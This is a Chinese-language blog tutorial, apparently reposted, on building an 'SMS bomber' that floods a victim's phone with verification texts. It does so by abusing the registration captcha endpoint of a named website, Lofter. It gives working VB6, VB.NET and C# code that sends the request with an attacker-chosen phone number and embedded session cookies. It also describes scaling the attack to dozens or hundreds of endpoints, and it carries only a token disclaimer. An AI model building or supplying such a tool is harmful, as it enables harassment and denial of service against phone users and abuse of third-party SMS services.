VB 揭秘短信轰炸器原理,教大家制作一个简单的短信轰炸器!

短信轰炸器估计大家都用过或者听说过,被攻击的手机一秒可以接收几十甚至更多的短信,从而影响正常的手机使用!

短信轰炸器的原理是什么?

利用其他网页注册或者其他操作,使其发送短信验证码到你指定的对象手机上面去,实现所谓的短信轰炸。

今天给大家介绍下用编程的方式,怎么制作一个简单的短信轰炸器。

我们今天以以下链接的注册为例:

http://www.lofter.com/phoneAccount/register

揭秘短信轰炸器原理,教大家制作一个简单的短信轰炸器!

2.用HttpWatch网页封包工具,拦截点击获取验证码后所获取的封包!

揭秘短信轰炸器原理,教大家制作一个简单的短信轰炸器!

3.我们可以看到,这只是一个简单的网页GET的方式访问!从而提交信息,获取验证码!

提交的地址:

https://www.lofter.com/lpt/getCaptcha.do?clientType=0&deviceType=pc&phone=15522066996&callback=loft.m.register.g.jsonpgetCaptcha

唯一的可以改变的参数是phone(也就是我们即将攻击的手机号)

4.我们编写代码。(以VB6.0为例)

揭秘短信轰炸器原理,教大家制作一个简单的短信轰炸器!

VB6.0:

Private Sub Command1_Click()
Dim ShuJu As String
Dim WinHttp As WinHttp.WinHttpRequest '声明一个对象
Set WinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
''''''''''''''''''''''
WinHttp.Open "POST", "https://www.lofter.com/lpt/getCaptcha.do?clientType=0&deviceType=pc&phone=" & Text1.Text & "&callback=loft.m.register.g.jsonpgetCaptcha", True
WinHttp.SetTimeouts 30000, 30000, 30000, 30000 '设置超时时间
WinHttp.Option(WinHttpRequestOption_SslErrorIgnoreFlags) = &H3300 '忽略错误
'''''''''''''''''''''''''''''''''
WinHttp.SetRequestHeader "Accept", "application/javascript, */*;q=0.8"
WinHttp.SetRequestHeader "Accept-Encoding", "gzip, deflate"
WinHttp.SetRequestHeader "Accept-Language", "zh-CN"
WinHttp.SetRequestHeader "Connection", "Keep-Alive"
WinHttp.SetRequestHeader "Cookie", "NTESLOFTSI=476AB0555253F1FDC0FFC23370A1BB7A.classa-lofter6-8010; firstentry=%2FphoneAccount.do%3Fop%3Dregister%26X-From-ISP%3D2|; usertrack=ezq0pVl4k3SL3nF+B14zAg==; JSESSIONID-WLF-XXD=cc979d0bcc3e664eeb8666b1d35c4cee5cb99e7bc5ad8941393a87f13c78ad44badf36c77ddc12995b027a8d3648ab5a73e244e1ecb3031f2576b9a43df6761f54ebf5b33a081f3228cf409e5c75fc7e618ceb103ab404c03c554565143614dbf290a029485747f0f3d8736742e46d26210d51d4935140934af572a1a24af575c7b68882; _ga=GA1.2.1669147748.1501074293; _gid=GA1.2.856055346.1501074293; _gat=1; _ntes_nnid=37b1f25a2bce5b2d452fef27fe940430,1501074294157; __utma=61349937.1669147748.1501074293.1501074301.1501074301.1; __utmb=61349937.1.10.1501074301; __utmc=61349937; __utmz=61349937.1501074301.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"
WinHttp.SetRequestHeader "Host", "www.lofter.com"
WinHttp.SetRequestHeader "Referer", "http://www.lofter.com/phoneAccount/register"
WinHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
'''''''''''''''''''''''''''''''''''''
WinHttp.Send '发送
WinHttp.WaitForResponse '异步发送
'''''''''''''''''''''''''
Set WinHttp = Nothing
MsgBox "发送成功!"
End Sub

VB.net:

Dim httpResp As System.Net.HttpWebResponse
Dim httpUrl2 As New System.Uri("https://www.lofter.com/lpt/getCaptcha.do?clientType=0&deviceType=pc&phone=" & TextBox1.Text & "&callback=loft.m.register.g.jsonpgetCaptcha")
Dim req As HttpWebRequest
req = CType(WebRequest.Create(httpUrl2), HttpWebRequest)
req.Method = "POST"
req.ContentType = "application/x-www-form-urlencoded"
req.Accept = "*/*"
req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER"
req.Connection = "keepalive"
req.Referer = "http://www.lofter.com/phoneAccount/register"
req.Headers.Add("Accept-Encoding", "gzip, deflate, sdch, br")
req.Headers.Add("Accept-Language", "zh-CN,zh;q=0.8")
req.Headers.Add("Cookie", "usertrack=ezq0plnH3zxYc/kOWtvTAg==; _ntes_nnid=05d47fa74374029e867467ad3719fd6e,1507661192871; firstentry=%2FphoneAccount.do%3Fop%3Dregister%26X-From-ISP%3D1|http%3A%2F%2Fwww.cmliu.net%2F%3Fid%3D55; JSESSIONID-WLF-XXD=7caf43e61aef023fc288025b71f89d179827bef2b7fcda6faceb5432f895045de38817f475e83f8b54883bf3c695d28cc8f17a484c74440d2f1a5d632fafcddebf0922a7514840a17ee1c8a091701aa7e5c1fb1b3837d23763d5d9c49da29c8e9dbe754d1d965a7d35e59f0b726a0952452eed9a4b0c82f130e57d5cdf1eef90de521f94; NTESLOFTSI=E5F38695BC193864ECA8E12419C8BE07.hzabj-lofter1-8010")
'req.Headers.Add("Host", "www.lofter.com")
 
Dim bytesData() As Byte = Encoding.ASCII.GetBytes("SEARCHSTRING=test")
req.ContentLength = bytesData.Length
Dim postStream As Stream = req.GetRequestStream()
postStream.Write(bytesData, 0, bytesData.Length)
postStream.Close()
Dim res As HttpWebResponse = CType(req.GetResponse(), HttpWebResponse)
Dim reader As StreamReader = New StreamReader(res.GetResponseStream, System.Text.Encoding.GetEncoding("utf-8"))
Dim respHTML As String = reader.ReadToEnd()
res.Close()
MsgBox(respHTML)

C#:

Encoding encode = System.Text.Encoding.GetEncoding("utf-8");
byte[] arrB = encode.GetBytes("");
HttpWebRequest myReq = (HttpWebRequest)WebRequest.Create("https://www.lofter.com/lpt/getCaptcha.do?clientType=0&deviceType=pc&phone="+ textBox1.Text + "&callback=loft.m.register.g.jsonpgetCaptcha");
myReq.Method = "POST";
myReq.ContentType = "application/x-www-form-urlencoded";
myReq.Accept = "*/*";
myReq.Headers.Add ("Cookie", "usertrack=ezq0plnH3zxYc/kOWtvTAg==; _ntes_nnid=05d47fa74374029e867467ad3719fd6e,1507661192871; firstentry=%2FphoneAccount.do%3Fop%3Dregister%26X-From-ISP%3D1|http%3A%2F%2Fwww.cmliu.net%2F%3Fid%3D55; JSESSIONID-WLF-XXD=7caf43e61aef023fc288025b71f89d179827bef2b7fcda6faceb5432f895045de38817f475e83f8b54883bf3c695d28cc8f17a484c74440d2f1a5d632fafcddebf0922a7514840a17ee1c8a091701aa7e5c1fb1b3837d23763d5d9c49da29c8e9dbe754d1d965a7d35e59f0b726a0952452eed9a4b0c82f130e57d5cdf1eef90de521f94; NTESLOFTSI=E5F38695BC193864ECA8E12419C8BE07.hzabj-lofter1-8010");
myReq.ContentLength = arrB.Length;
Stream outStream = myReq.GetRequestStream();
outStream.Write(arrB, 0, arrB.Length);
//接收HTTP做出的响应  
WebResponse myResp = myReq.GetResponse();
Stream ReceiveStream = myResp.GetResponseStream();
StreamReader readStream = new StreamReader(ReceiveStream, encode);
Char[] read = new Char[256];
int count = readStream.Read(read, 0, 256);
string str = null;
while (count > 0)
{
    str += new String(read, 0, count);
    count = readStream.Read(read, 0, 256);
}
readStream.Close();
myResp.Close();
//Response.Write(str);
MessageBox.Show(str);

5.运行程序,测试下!

揭秘短信轰炸器原理,教大家制作一个简单的短信轰炸器!

测试成功,能正常接收到短信,当然这只是最简单的,远远还不能达到“轰炸”的效果!因为只有一个接口,当我们接口达到几十个甚至上百个的时候,就可以达到“轰炸”的效果了!一秒可以发送几十条甚至更多的短信!

(本教程仅起交流学习用,切记不可做坏事哦!!!)

转至http://www.toutiao.com/a6447232530861408526/?iid=16155582086

发表评论

邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据